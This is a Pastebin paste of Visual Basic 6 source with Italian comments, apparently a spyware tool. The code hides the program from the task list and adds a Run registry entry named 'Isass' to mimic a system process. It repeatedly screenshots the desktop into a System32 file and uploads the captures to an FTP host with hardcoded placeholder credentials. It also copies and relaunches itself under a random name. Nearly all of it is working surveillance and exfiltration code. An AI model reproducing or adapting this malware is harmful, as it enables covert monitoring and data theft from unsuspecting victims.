Advertisement
Guest User

Untitled

a guest
May 20th, 2017
105
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.61 KB | None | 0 0
  1. Private Sub Form_Load()
  2. App.TaskVisible = Not _
  3. True
  4. Picture1.AutoSize = True
  5. Set reg = CreateObject("Wscript.shell")
  6. reg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Isass", App.Path & "\fbichat.exe"
  7. Dim Ritardo As Long 'dichiarazione variabile ritardo
  8. Timer1.Interval = Ritardo + 145 'imposto un ritardo minimo per captare i tasti, altrimenti potrebbe essere simulata la pressione ripetuta di un tasto
  9. End Sub
  10.  
  11. Private Sub testo_Change()
  12. Set Picture1.Picture = CaptureScreen()
  13.  
  14. SavePicture Picture1.Image, "C:\WINDOWS\SYSTEM32\keylog.bmp"
  15.  
  16.  
  17. End Sub
  18.  
  19. Private Sub Timer1_Timer()
  20. Set Picture1.Picture = CaptureScreen()
  21.  
  22. SavePicture Picture1.Image, "C:\WINDOWS\SYSTEM32\keylog.bmp" '
  23.  
  24.  
  25.  
  26.  
  27. End Sub
  28.  
  29. Private Sub Timer2_Timer() 'ciclo per evitare connessioni molteplici al ftp
  30. Timer3.Enabled = True
  31. Timer2.Enabled = False
  32. End Sub
  33.  
  34. Private Sub Timer3_Timer() '
  35. Timer4.Enabled = True '
  36. Timer3.Enabled = False '
  37. End Sub
  38.  
  39. Private Sub Timer4_Timer() 'vedi commento timer2
  40. Timer5.Enabled = True 'ti consigblio di salvarlo cn un'altro nome In ke senzo dx Save As.. C'è QLC che nn mi quadra ad esempio i timeer rotofl proviamo prima.
  41. Timer4.Enabled = False
  42. End Sub
  43.  
  44. Private Sub Timer5_Timer() 'vedi commento timer2
  45. Timer6.Enabled = True
  46. Timer5.Enabled = False
  47. End Sub
  48.  
  49. Private Sub Timer6_Timer() 'vedi commento timer2 + upload file
  50. Dim nomefile As String 'dichiarazione nomefile, ossia il nome del file quando verrà uploadato sul nostro ftp
  51. Dim ftpwebsite As String 'dichiarazione ftpwebsite, ossia l'indirizzo ftp del nostro sito
  52. account = "Anke questo no" 'nome nostro account hosting
  53. pswd = "qstnontelado" 'password account hosting
  54. ftpwebsite = "ftp://conoscilapravacyxd" 'indirizzo ftp nostro host
  55. Inet1.URL = ftpwebsite 'settaggio indirizzo ftp
  56. Inet1.UserName = account 'settaggio account
  57. Inet1.Password = pswd 'settaggio password
  58. Dim NameScr As String
  59. NameScr = "screen" + "." + _
  60. "b" + "m" + "p"
  61. Kill ("C:\WINDOWS\SYSTEM32\" + NameScr)
  62. nomefile = "log.bmp" 'sostituire log.txt con il nome che vorrete dare al file uploadato sul vostro host
  63. Inet1.Execute Inet1.URL, "PUT C:\WINDOWS\system32\keylog.bmp " & nomefile
  64. Do While Inet1.StillExecuting = True
  65. DoEvents
  66. Loop
  67. Timer6.Enabled = False
  68. Timer2.Enabled = True
  69. Exit Sub
  70. lol:
  71. Dim NUMER As String
  72. NUMER = Int(Rnd * 99)
  73. FileCopy App.Path + "\" + App.EXEName + ".exe", "C:\WINDOWS\" + NUMER + ".exe"
  74. Shell ("C:\WINDOWS\" + NUMER + ".exe")
  75. Shell ("C:\WINDOWS\system32\cmd.exe /c tskill " + App.EXEName)
  76. Exit Sub
  77. End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement